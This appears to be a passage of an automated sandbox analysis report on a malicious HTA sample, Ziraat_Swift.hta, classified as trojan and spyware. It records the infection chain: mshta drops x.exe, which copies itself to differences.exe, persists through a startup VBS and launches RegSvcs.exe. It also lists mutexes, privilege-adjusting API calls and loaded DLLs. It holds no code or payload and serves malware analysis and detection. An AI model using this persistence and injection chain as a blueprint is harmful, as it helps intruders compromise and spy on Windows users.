                  Source: pwahelper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_proxy.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pwahelper.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SingleClientServicesUpdater.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroCEF.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVDllSurrogate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVDllSurrogate32.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVDllSurrogate64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVLP.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: OneDriveSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Integrator.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroTextExtractor.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ADelRCP.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ADNotificationManager.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeCollabSync.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WCChromeNativeMessagingHost.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: CRLogTransport.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: CRWindowsClientService.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Eula.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: LogTransport2.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: adobe_licensing_wf_acro.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: adobe_licensing_wf_helper_acro.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 32BitMAPIBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 64BitMAPIBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MSRMSPIBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FullTrustNotifier.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ShowAppPickerForPDF.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Acrobat.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: appvcleaner.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winHTA@28/149@27/12
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0046A06A GetLastError,FormatMessageW,1_2_0046A06A
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_004581CB AdjustTokenPrivileges,CloseHandle,1_2_004581CB
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_004587E1
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_0046B333
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_0047EE0D
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,1_2_0046C397
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_00404E89
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00A9CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,1_2_00A9CBD0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\user\AppData\Roaming\31d53b0537b9f482.bin
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-31d53b0537b9f482-inf
                  Source: C:\Windows\System32\alg.exe | Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-31d53b0537b9f4829ea72c54-b
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-31d53b0537b9f4827d8e3ee9-b
                  Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs"
                  Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: Ziraat_Swift.hta | Virustotal: Detection: 8%
                  Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Ziraat_Swift.hta"
                  Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: unknown | Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                  Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\subpredicate\differences.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                  Source: unknown | Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\subpredicate\differences.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Process created: C:\Users\user\AppData\Local\subpredicate\differences.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\subpredicate\differences.exe"
                  Source: unknown | Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                  Source: unknown | Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                  Source: unknown | Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                  Source: unknown | Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: unknown | Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                  Source: unknown | Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                  Source: unknown | Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
                  Source: unknown | Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                  Source: C:\Windows\SysWOW64\mshta.exe | Sections loaded: iertutil.dll, wldp.dll, mshtml.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, cryptbase.dll, urlmon.dll, srvcli.dll, kernel.appcore.dll, msiso.dll, uxtheme.dll, srpapi.dll, windows.storage.dll, propsys.dll, msimtf.dll, dxgi.dll, resourcepolicyclient.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, dataexchange.dll, d3d11.dll, dcomp.dll, twinapi.appcore.dll, msls31.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, version.dll, msxml3.dll, msdart.dll, scrrun.dll, sxs.dll, msasn1.dll, gpapi.dll, mpr.dll, edputil.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll, jscript9.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, winhttp.dll, secur32.dll, sspicli.dll, dnsapi.dll, kernel.appcore.dll, ntmarta.dll, windows.storage.dll, wldp.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, ondemandconnroutehelper.dll, mswsock.dll, winnsi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, webio.dll, apphelp.dll
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Sections loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\alg.exe | Sections loaded: cryptbase.dll, mswsock.dll, winhttp.dll, mpr.dll, secur32.dll, sspicli.dll, dnsapi.dll, iphlpapi.dll, ntmarta.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winnsi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, webio.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: drprov.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ntlanman.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: davclnt.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: davhlpr.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: browcli.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: dbghelp.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: mpr.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: secur32.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: sspicli.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: version.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: msasn1.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: mpr.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: secur32.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: sspicli.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Section loaded: uxtheme.dll
